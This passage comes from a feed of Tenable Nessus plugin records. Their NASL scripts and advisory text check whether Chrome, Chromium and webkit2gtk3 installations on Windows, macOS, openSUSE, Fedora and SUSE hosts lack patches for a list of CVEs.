script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'70.0.3538.67', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-09T18:53:59", "description": "The version of Google Chrome installed on the remote Windows host is prior to 70.0.3538.67. It is, therefore, affected by multiple vulnerabilities as noted in Google Chrome stable channel update release notes for 2018/10/16. Please refer to the release notes for additional information. Note that Nessus has not attempted to exploit these issues but has instead relied only on the application's self- reported version number.", "cvss3": {"score": 9.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2018-10-16T00:00:00", "type": "nessus", "title": "Google Chrome < 70.0.3538.67 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17462", "CVE-2018-17463", "CVE-2018-17464", "CVE-2018-17465", "CVE-2018-17466", "CVE-2018-17467", "CVE-2018-17468", "CVE-2018-17469", "CVE-2018-17470", "CVE-2018-17471", "CVE-2018-17472", "CVE-2018-17473", "CVE-2018-17474", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17477", "CVE-2018-5179"], "modified": "2022-06-08T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_70_0_3538_67.NASL", "href": "https://www.tenable.com/plugins/nessus/118153", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(118153);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2018-5179\",\n \"CVE-2018-17462\",\n \"CVE-2018-17463\",\n \"CVE-2018-17464\",\n \"CVE-2018-17465\",\n \"CVE-2018-17466\",\n \"CVE-2018-17467\",\n \"CVE-2018-17468\",\n \"CVE-2018-17469\",\n \"CVE-2018-17470\",\n \"CVE-2018-17471\",\n \"CVE-2018-17472\",\n \"CVE-2018-17473\",\n \"CVE-2018-17474\",\n \"CVE-2018-17475\",\n \"CVE-2018-17476\",\n \"CVE-2018-17477\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"Google Chrome < 70.0.3538.67 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by\nmultiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is\nprior to 70.0.3538.67. It is, therefore, affected by multiple\nvulnerabilities as noted in Google Chrome stable channel update\nrelease notes for 2018/10/16. Please refer to the release notes for\nadditional information. Note that Nessus has not attempted to exploit\nthese issues but has instead relied only on the application's self-\nreported version number.\");\n # https://chromereleases.googleblog.com/2018/10/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1c8f5c86\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 70.0.3538.67 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-17474\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2018-17472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 67, 68 and 69 Object.create exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'70.0.3538.67', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-09T18:53:25", "description": "This update for Chromium to version 70.0.3538.67 fixes multiple issues.\n\nSecurity issues fixed (bsc#1112111) :\n\n - CVE-2018-17462: Sandbox escape in AppCache\n\n - CVE-2018-17463: Remote code execution in V8\n\n - Heap buffer overflow in Little CMS in PDFium\n\n - CVE-2018-17464: URL spoof in Omnibox\n\n - CVE-2018-17465: Use after free in V8\n\n - CVE-2018-17466: Memory corruption in Angle\n\n - CVE-2018-17467: URL spoof in Omnibox\n\n - CVE-2018-17468: Cross-origin URL disclosure in Blink\n\n - CVE-2018-17469: Heap buffer overflow in PDFium\n\n - CVE-2018-17470: Memory corruption in GPU Internals\n\n - CVE-2018-17471: Security UI occlusion in full screen mode\n\n - CVE-2018-17473: URL spoof in Omnibox\n\n - CVE-2018-17474: Use after free in Blink\n\n - CVE-2018-17475: URL spoof in Omnibox\n\n - CVE-2018-17476: Security UI occlusion in full screen mode\n\n - CVE-2018-5179: Lack of limits on update() in ServiceWorker\n\n - CVE-2018-17477: UI spoof in Extensions\n\nVAAPI hardware accelerated rendering is now enabled by default. This update contains the following packaging changes :\n\n - Use the system libusb-1.0 library\n\n - Use bundled harfbuzz library\n\n - Disable gnome-keyring to avoid crashes", "cvss3": {"score": 9.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2018-10-25T00:00:00", "type": "nessus", "title": "openSUSE Security Update : Chromium (openSUSE-2018-1253)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17462", "CVE-2018-17463", "CVE-2018-17464", "CVE-2018-17465", "CVE-2018-17466", "CVE-2018-17467", "CVE-2018-17468", "CVE-2018-17469", "CVE-2018-17470", "CVE-2018-17471", "CVE-2018-17472", "CVE-2018-17473", "CVE-2018-17474", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17477", "CVE-2018-5179"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "p-cpe:/a:novell:opensuse:chromium-debugsource", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2018-1253.NASL", "href": "https://www.tenable.com/plugins/nessus/118386", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-1253.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(118386);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2018-17462\",\n \"CVE-2018-17463\",\n \"CVE-2018-17464\",\n \"CVE-2018-17465\",\n \"CVE-2018-17466\",\n \"CVE-2018-17467\",\n \"CVE-2018-17468\",\n \"CVE-2018-17469\",\n \"CVE-2018-17470\",\n \"CVE-2018-17471\",\n \"CVE-2018-17472\",\n \"CVE-2018-17473\",\n \"CVE-2018-17474\",\n \"CVE-2018-17475\",\n \"CVE-2018-17476\",\n \"CVE-2018-17477\",\n \"CVE-2018-5179\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"openSUSE Security Update : Chromium (openSUSE-2018-1253)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for Chromium to version 70.0.3538.67 fixes multiple\nissues.\n\nSecurity issues fixed (bsc#1112111) :\n\n - CVE-2018-17462: Sandbox escape in AppCache\n\n - CVE-2018-17463: Remote code execution in V8\n\n - Heap buffer overflow in Little CMS in PDFium\n\n - CVE-2018-17464: URL spoof in Omnibox\n\n - CVE-2018-17465: Use after free in V8\n\n - CVE-2018-17466: Memory corruption in Angle\n\n - CVE-2018-17467: URL spoof in Omnibox\n\n - CVE-2018-17468: Cross-origin URL disclosure in Blink\n\n - CVE-2018-17469: Heap buffer overflow in PDFium\n\n - CVE-2018-17470: Memory corruption in GPU Internals\n\n - CVE-2018-17471: Security UI occlusion in full screen\n mode\n\n - CVE-2018-17473: URL spoof in Omnibox\n\n - CVE-2018-17474: Use after free in Blink\n\n - CVE-2018-17475: URL spoof in Omnibox\n\n - CVE-2018-17476: Security UI occlusion in full screen\n mode\n\n - CVE-2018-5179: Lack of limits on update() in\n ServiceWorker\n\n - CVE-2018-17477: UI spoof in Extensions\n\nVAAPI hardware accelerated rendering is now enabled by default. This\nupdate contains the following packaging changes :\n\n - Use the system libusb-1.0 library\n\n - Use bundled harfbuzz library\n\n - Disable gnome-keyring to avoid crashes\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1112111\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Chromium packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 67, 68 and 69 Object.create exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/11/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromedriver-70.0.3538.67-179.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromedriver-debuginfo-70.0.3538.67-179.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromium-70.0.3538.67-179.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromium-debuginfo-70.0.3538.67-179.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromium-debugsource-70.0.3538.67-179.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-09T15:04:37", "description": "Update to chromium 70.0.3538.77. Fixes CVE-2018-16435 CVE-2018-17462 CVE-2018-17463 CVE-2018-17464 CVE-2018-17465 CVE-2018-17466 CVE-2018-17467 CVE-2018-17468 CVE-2018-17469 CVE-2018-17470 CVE-2018-17471 CVE-2018-17473 CVE-2018-17474 CVE-2018-17475 CVE-2018-17476 CVE-2018-5179 CVE-2018-17477\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-01-03T00:00:00", "type": "nessus", "title": "Fedora 29 : chromium (2018-34f7f68029)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-16435", "CVE-2018-17462", "CVE-2018-17463", "CVE-2018-17464", "CVE-2018-17465", "CVE-2018-17466", "CVE-2018-17467", "CVE-2018-17468", "CVE-2018-17469", "CVE-2018-17470", "CVE-2018-17471", "CVE-2018-17472", "CVE-2018-17473", "CVE-2018-17474", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17477", "CVE-2018-5179"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:chromium", "cpe:/o:fedoraproject:fedora:29"], "id": "FEDORA_2018-34F7F68029.NASL", "href": "https://www.tenable.com/plugins/nessus/120342", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-34f7f68029.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120342);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2018-16435\",\n \"CVE-2018-17462\",\n \"CVE-2018-17463\",\n \"CVE-2018-17464\",\n \"CVE-2018-17465\",\n \"CVE-2018-17466\",\n \"CVE-2018-17467\",\n \"CVE-2018-17468\",\n \"CVE-2018-17469\",\n \"CVE-2018-17470\",\n \"CVE-2018-17471\",\n \"CVE-2018-17472\",\n \"CVE-2018-17473\",\n \"CVE-2018-17474\",\n \"CVE-2018-17475\",\n \"CVE-2018-17476\",\n \"CVE-2018-17477\",\n \"CVE-2018-5179\"\n );\n script_xref(name:\"FEDORA\", value:\"2018-34f7f68029\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"Fedora 29 : chromium (2018-34f7f68029)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Update to chromium 70.0.3538.77. Fixes CVE-2018-16435 CVE-2018-17462\nCVE-2018-17463 CVE-2018-17464 CVE-2018-17465 CVE-2018-17466\nCVE-2018-17467 CVE-2018-17468 CVE-2018-17469 CVE-2018-17470\nCVE-2018-17471 CVE-2018-17473 CVE-2018-17474 CVE-2018-17475\nCVE-2018-17476 CVE-2018-5179 CVE-2018-17477\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-34f7f68029\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-17474\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 67, 68 and 69 Object.create exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/09/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^29([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 29\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC29\", reference:\"chromium-70.0.3538.77-4.fc29\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:27:07", "description": "This update for webkit2gtk3 to version 2.24.1 fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2019-6201, CVE-2019-6251, CVE-2019-7285, CVE-2019-7292, CVE-2019-8503, CVE-2019-8506, CVE-2019-8515, CVE-2019-8518, CVE-2019-8523, CVE-2019-8524, CVE-2019-8535, CVE-2019-8536, CVE-2019-8544, CVE-2019-8551, CVE-2019-8558, CVE-2019-8559, CVE-2019-8563, CVE-2019-11070 (bsc#1132256).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-05-06T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : webkit2gtk3 (SUSE-SU-2019:1137-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11070", "CVE-2019-6201", "CVE-2019-6251", "CVE-2019-7285", "CVE-2019-7292", "CVE-2019-8503", "CVE-2019-8506", "CVE-2019-8515", "CVE-2019-8518", "CVE-2019-8523", "CVE-2019-8524", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-8544", "CVE-2019-8551", "CVE-2019-8558", "CVE-2019-8559", "CVE-2019-8563"], "modified": "2021-01-13T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0", "p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore", "p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2", "p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension", "p-cpe:/a:novell:suse_linux:webkit-jsc", "p-cpe:/a:novell:suse_linux:webkit-jsc-4-debuginfo", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource", "p-cpe:/a:novell:suse_linux:webkit2gtk3-devel", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2019-1137-1.NASL", "href": "https://www.tenable.com/plugins/nessus/124645", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:1137-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124645);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n script_cve_id(\"CVE-2019-11070\", \"CVE-2019-6201\", \"CVE-2019-6251\", \"CVE-2019-7285\", \"CVE-2019-7292\", \"CVE-2019-8503\", \"CVE-2019-8506\", \"CVE-2019-8515\", \"CVE-2019-8518\", \"CVE-2019-8523\", \"CVE-2019-8524\", \"CVE-2019-8535\", \"CVE-2019-8536\", \"CVE-2019-8544\", \"CVE-2019-8551\", \"CVE-2019-8558\", \"CVE-2019-8559\", \"CVE-2019-8563\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : webkit2gtk3 (SUSE-SU-2019:1137-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for webkit2gtk3 to version 2.24.1 fixes the following\nissues :\n\nSecurity issues fixed :\n\nCVE-2019-6201, CVE-2019-6251, CVE-2019-7285, CVE-2019-7292,\nCVE-2019-8503, CVE-2019-8506, CVE-2019-8515, CVE-2019-8518,\nCVE-2019-8523, CVE-2019-8524, CVE-2019-8535, CVE-2019-8536,\nCVE-2019-8544, CVE-2019-8551, CVE-2019-8558, CVE-2019-8559,\nCVE-2019-8563, CVE-2019-11070 (bsc#1132256).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1132256\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-11070/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6201/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6251/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-7285/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-7292/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8503/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8506/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8515/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8518/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8523/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8524/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8535/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8536/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8544/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8551/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8558/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8559/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8563/\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-20191137-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d4b8f79e\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Open Buildservice Development Tools\n15:zypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-2019-1137=1\n\nSUSE Linux Enterprise Module for Desktop Applications 15:zypper in -t\npatch SUSE-SLE-Module-Desktop-Applications-15-2019-1137=1\n\nSUSE Linux Enterprise Module for Basesystem 15:zypper in -t patch\nSUSE-SLE-Module-Basesystem-15-2019-1137=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 